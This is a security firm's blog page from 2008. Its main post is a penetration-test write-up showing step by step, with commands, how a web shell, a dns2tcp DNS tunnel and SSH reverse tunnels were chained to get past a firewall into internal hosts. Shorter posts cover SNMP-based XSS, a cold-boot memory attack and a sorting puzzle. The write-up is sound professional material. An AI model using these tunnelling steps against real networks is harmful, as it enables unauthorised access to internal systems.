Grey bar Blue bar
Share this:

Thu, 28 Feb 2008

DNS Tunnels (RE-REDUX)

On a recent assessment we came across the following scenario:

1) We have command execution through a web command interpreter script (cmd.jsp) on a remote Linux webserver 2) The box is firewalled only allowing 53 UDP ingress and egress

3) The box is sitting on the network perimeter, with one public IP and one internal IP, and not in a DMZ So we want to tunnel from the SensePost offices to Target Company's internal machines, with this pretty restrictive setup. How did we accomplish this?

1) Upload and compile dns2tcp to the target machine

2) Create a dns2tcp tunnel from target (dns2tcp client) to SPDNSTUNNEL (dns2tcp server)

  • SPDNSTUNNEL is running a dns2tcp server offering two services, ssh and proxy. The dns2tcp client can connect from target to SPDNSTUNNEL's ssh or proxy ports over its 'TCP' channel. This is done with the following command, where we setup target to listen locally on 55555:
    • ./dns2tcpc -z mooo.mooo.moooo -r ssh -l 55555
    • (Creating Target:55555 ---TCP/53---> SPDNSTUNNEL:sshPort).
3) Create an SSH tunnel from target to SPDNSTUNNEL, forwarding traffic from SPDNSTUNNEL through target to internal network
  • Since we have a non interactive shell on the webserver we needed to create this tunnel with a single command with no prompts. We created a dummy user on SPDNSTUNNEL and created ssh keys for it. We uploaded the ssh keys to target and issuing the following command through an uploaded bashscript ssh-ed into SPDNSTUNNEL through the DNS tunnel:
    • ssh -i /tmp/key -p 55555 -l tunnelUser-R -o "stricthostkeychecking=no"
4) What do we have now? We have SPDNSTUNNEL listening on 4444. Connections made to SPDNSTUNNEL on 4444 will connect to on port 80. So the final step is to create tunnel from our assessment laptop, to SPDNSTUNNEL's 4444, allowing us to connect to the target's internal network from the comfort of our SensePost pods:
  • Linux :: [glenn@localhost] ssh -L 3333:localhost:4444 -l glenn
  • Windows :: Use putty's ssh tunnel option, setting "Source port" to 3333 and destination to "localhost:4444
5) Now, if we want to connect to different target internal machine what do we need to do with the above London Underground of tunnels? We need only to change the exit point on the compromised target machine's tunnel, all the other tunnels stay intact. So we leave the DNS tunnel in place, and tear down the SSH tunnel executing the following on SPDNSTUNNEL:
  • ps auux | grep ssh | egrep '^tunnelUser' | cut -f 3 -d " " | xargs kill ; clear ; tail -f /var/log/secure
    • (tailing /var/log/secure is useful, upon executing the ssh command on target we should see a connect from tunnelUser)
..and create a new ssh tunnel by executing a modified .sh script with the following in it from the target machine:
  • ssh -i /tmp/key -p 55555 -l tunnelUser-R -o "stricthostkeychecking=no"
As you see the only change in the whole setup is the internal target machine and point in this one command. We can now connect to the CEO's laptop's samba share by smbclient-ing to our assessment laptop on port 3333.

See the attached picture for a summary of the above.



Wed, 27 Feb 2008

SNMP Joins Dark Side in New XSS Attack

-sigh- the topic is stolen directly from the [DarkReading Article] -snip- It’s yet another new spin on a pervasive attack -- this time using the old standby Simple Network Management Protocol (SNMP) to stage cross-site scripting (XSS) attacks. -snip-

-sigh- a little while back while doing a pen-test on a 1U device, we found that a well poisoned SNMP string could easily result in XSS and even SQL Injection attacks.

a few months later, nick used a variation of this by simply using XSS payloads as his SSID and broadcasting near wifi IDS devices with web based management consoles.

My point is simply that this hardly counts as a new attack.. (we didnt even think it was novel enough to blog at the time!)

-sigh- ignore me.. im older and cynicaler and tireder today.. i should get some sleep...

Thu, 21 Feb 2008

Prof Felten (and friends) attack bitlocker/filevault (and friends)

So felten et al basically figured that cooling dram chips  allows an attacker to move them to another machine where they can be leeched!


The geek in me cant help but say "COOL!" According to the comments posted (by Eugene Spafford no less) this sort of attack is fairly well known.. but.. for this humble fanboy, i think its still pretty rocking!

Mon, 18 Feb 2008

HTTP-Mangler QoW...

Many people took a crack at "what tool will work to replace mangler, out of the box" and so we have a bunch of new tools to play with..

Steven's answer of MS-Word or PowerPoint left us scratching our heads a little, and rezn threw in the added complexity of the app requiring valid certs..

(to answer rezn, i think you could avoid the SSL complications with judicious use of a detours app or echo-mirage from

The answer the panel was looking for (for some definition of panel) was.. webscarab-ng.. as Lohan points out here...

ah well.. another cheap, quick informal QoW follows intercrastically..

Sorting your shoes like a whore!

(my first X-Rated blog post.. i should hook up ad-words and watch the money roll in!)

Ok.. our Zimbabwean recruit was posed the following question by some international academics:

Q:"How would you sort your shoes?"

He answered:

A: "I make the assumption that the shoes are positioned such that I can see their sizes, and that they are in a row of boxes. I would randomly pick a pair of shoes in a box and call them my 'pivot point'. I would then reorder the shoes such that all shoes with sizes less than my pivot are on the left of it, and all shoes with a greater size are on the right of the pivot (perhaps having 2 piles of shoes next to me as I work, one for size less than, one for size greater than). This pivot pair of shoes would now be in their correct sorted position. I would then apply this same process to the left and right sets of shoes, and then to their left(left,right) and right(left,right) sets, continuing this process until all shoes have been 'pivoted' or there is only one or zero pair of shoes between two pivots. (i.e a set of only one pair)."

Now.. this seems impressive.. but my response was (kinda) Thats a whoreish way to do it..

QoW-1: What possessed me to respond like this?

QoW-2: Do you have a better solution? and why?